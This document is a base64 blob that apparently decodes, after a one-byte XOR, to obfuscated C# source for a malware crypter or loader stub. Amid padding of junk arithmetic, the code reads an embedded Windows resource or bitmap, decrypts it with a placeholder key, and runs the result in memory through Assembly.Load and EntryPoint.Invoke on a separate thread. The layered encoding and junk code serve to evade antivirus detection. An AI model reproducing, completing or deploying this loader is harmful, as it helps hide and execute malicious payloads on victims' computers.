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N0xoZGJgLWd8cWBeWCVsaGIsCA8lJSUlJSUlJX4IDyUlJSUlJSUlJSUlJXB2bGtiJS1zZHcldnF3YGRoJTgla2ByJUhgaGp3fFZxd2BkaC1saGIsLAgPJSUlJSUlJSUlJSUlfggPJSUlJSUlJSUlJSUlJSUlJXdgcXB3ayVrYHIlR2xxaGR1LXZxd2BkaCw+CA8lJSUlJSUlJSUlJSV4CA8lJSUlJSUlJXgIDwwMCA8lJSUlJSUlJXZxZHFsZiVzamxhJUhkbGstLAgPJSUlJSUlJSV+CA8lJSUlJSUlJSUlJSVxd3wIDyUlJSUlJSUlJSUlJX4MDAgPDAwMDExrcVVxdyVjV2B2anB3ZmAlOCVDbGthV2B2anB3ZmAta2ByJUxrcVVxdy01LCkla2ByJUxrcVVxdy00MTUsKSVrYHIlTGtxVXF3LTc2LCw+CA8MDAwMcGxrcSV2V2B2anB3ZmAlOCVWbH9gamNXYHZqcHdmYC1rYHIlTGtxVXF3LTUsKSVjV2B2anB3ZmAsPggPDAwMDExrcVVxdyVpV2B2anB3ZmAlOCVJamRhV2B2anB3ZmAta2ByJUxrcVVxdy01LCklY1dgdmpwd2ZgLD4IDwwMDAxMa3FVcXclYVdgdmpwd2ZgJTglSWpmbldgdmpwd2ZgLWlXYHZqcHdmYCw+CA8MDAwMCA8MDAwMR3xxSFYlOCVrYHIlZ3xxYF52V2B2anB3ZmBYPggPDAwMDFZ8dnFgaCtXcGtxbGhgK0xrcWB3anVWYHdzbGZgditIZHd2bWRpK0ZqdXwtYVdgdmpwd2ZgKSVHfHFIViklNSklVnx2cWBoK0Zqa3Ngd3ErUWpMa3E2Ny12V2B2anB3ZmAsLD4IDwwMDAxHfHFIViU4JUlxTnR/bkstRmprc2B3cUN3amhHaHUtR3xxYDdMaGRiYC1HfHFIViwsLD4IDwwMDAwIDwwMDAxWfHZxYGgrUW13YGRhbGtiK1Ftd2BkYSVxbXclOCVrYHIlVnx2cWBoK1Ftd2BkYWxrYitRbXdgZGEtbmlDfXBpaVNfd3J2SVVEYSw+CA8MDAwMcW13K1ZxZHdxLSw+CA8lJSUlJSUlJSUlJSV4CA8lJSUlJSUlJSUlJSVmZHFmbQgPJSUlJSUlJSUlJSUlfggPCA8lJSUlJSUlJSUlJSV4CA8lJSUlJSUlJXgIDyUl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